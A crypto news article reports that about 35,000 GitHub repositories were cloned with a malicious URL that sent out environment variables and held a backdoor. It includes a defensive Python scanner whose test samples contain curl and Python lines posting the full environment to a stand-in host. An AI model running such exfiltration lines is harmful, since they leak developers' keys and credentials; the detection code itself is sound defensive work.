
Crypto Threat: Malware Infiltrates Github Cloning Thousands of Repos

Updated by Kyle Baird

In Brief

  • As many as 35,000 repos have been cloned.
  • A malicious URL attempts to steal data.
  • Github has cleaned up the fake repos.

The developer platform Github has been inundated with malware that has infiltrated tens of thousands of repositories.

As many as 35,000 Github repositories have been cloned with malware, according to a security researcher.

The widespread malware attack did not target crypto repositories (repos) specifically, but they have been among those impacted.

Software engineer Stephen Lacy alerted the crypto community to the incursion on Aug. 3.

Cloning Github repos

Tech portal Bleeping Computer reported that the repos were not hacked but had been copied, with their clones altered to include the malware. Cloning open source code is a common practice among developers; however, the attackers have injected malicious code and links into legitimate projects to target unsuspecting developers.

Several projects from crypto, Golang, Python, JavaScript, Bash, Docker, and Kubernetes have been affected by the attack, the researcher noted.

While reviewing a project he had found from a Google search, the engineer noticed a malicious URL in the code. Scanning Github repos for this URL returned more than 35,000 results.

Bleeping Computer said that more than 13,000 search results were from a single repository called ‘redhat-operator-ecosystem.’ The malicious URL “exfiltrated a user’s environment variables but additionally contained a one-line backdoor,” the report added.

These environment variables can contain sensitive data such as API keys, tokens, Amazon AWS credentials, and crypto keys. The malware also allows remote attackers to execute arbitrary code on the systems of all those who install and run the clones.
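A review check a developer can run over a checked-out clone before installing it, added here as an example and not taken from the report or from Github: it flags lines that read the whole process environment close to a hard-coded URL, the exfiltration behaviour described above. The regex patterns, function names and the `.invalid` URL in the constructed samples are assumptions; the article does not give the actual malicious URL.

```python
import re
from pathlib import Path

# Heuristics (assumptions, not indicators from the report): expressions that read
# the WHOLE process environment in the ecosystems the article names.
ENV_DUMP = re.compile(
    r"os\.environ\b(?!\s*(\[|\.get))"           # Python: whole mapping, not one key
    r"|os\.Environ\(\)"                          # Go
    r"|JSON\.stringify\(\s*process\.env\s*\)"    # JavaScript
    r"|\$\((env|printenv)\)|`(env|printenv)`"    # shell command substitution
)
URL = re.compile(r"https?://[^\s\"'`)]+", re.I)

def scan_text(text, window=2):
    """Return [(line_no, [urls])] where an environment dump sits near a URL."""
    lines = text.splitlines()
    hits = []
    for i, line in enumerate(lines):
        if not ENV_DUMP.search(line):
            continue
        nearby = lines[max(0, i - window): i + window + 1]
        urls = sorted({u for l in nearby for u in URL.findall(l)})
        if urls:
            hits.append((i + 1, urls))
    return hits

def scan_repo(root):
    """Walk a checked-out clone (skipping .git) and map file -> findings."""
    findings = {}
    for path in sorted(Path(root).rglob("*")):
        if ".git" in path.parts or not path.is_file() or path.stat().st_size > 1_000_000:
            continue
        hits = scan_text(path.read_text(errors="ignore"))
        if hits:
            findings[path.relative_to(root).as_posix()] = hits
    return findings

# Constructed sample files: two suspicious, one benign single-variable read.
SAMPLES = {
    "suspicious.py": 'import os, requests\n'
                     'requests.post("http://collector.example.invalid/u", data=dict(os.environ))\n',
    "suspicious.sh": '#!/bin/sh\ncurl -s -d "$(env)" http://collector.example.invalid/u\n',
    "benign.py": 'import os, requests\ntoken = os.environ["API_TOKEN"]\n'
                 'requests.get("https://api.example.com/v1", headers={"X-Token": token})\n',
}

if __name__ == "__main__":
    for name, body in SAMPLES.items():
        print(name, scan_text(body))
```

A hit is a prompt for manual review rather than a verdict, and the check does not look for the one-line backdoor the report mentions.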

The majority of the cloned repos had appeared within the past month, the report stated.

Github confirmed that the original repositories were not compromised and it had cleaned up or quarantined the clones.

Last month, BeInCrypto reported that a new strain of malware written in Rust was doing the rounds. Luca Stealer targets Windows operating systems and steals sensitive information such as crypto wallet information. The malware was also distributed on Github.

Miserable week in crypto

DeFi researcher Miles Deutscher pointed out that it has not been a great week in crypto. Earlier this week, the Nomad bridge was exploited for $190 million, and a few hours after, around 8,000 Solana wallets were hacked, resulting in the theft of an estimated $8 million.

Markets appear to be unaffected, though, as total capitalization has gained 1.7% on the day to reach $1.12 trillion at the time of writing.


Martin Young
Martin Young is a seasoned cryptocurrency journalist and editor with over 7 years of experience covering the latest news and trends in the digital asset space. He is passionate about making complex blockchain, fintech, and macroeconomics concepts understandable for mainstream audiences.   Martin has been featured in top finance, technology, and crypto publications including BeInCrypto, CoinTelegraph, NewsBTC, FX Empire, and Asia Times. His articles provide an in-depth analysis of...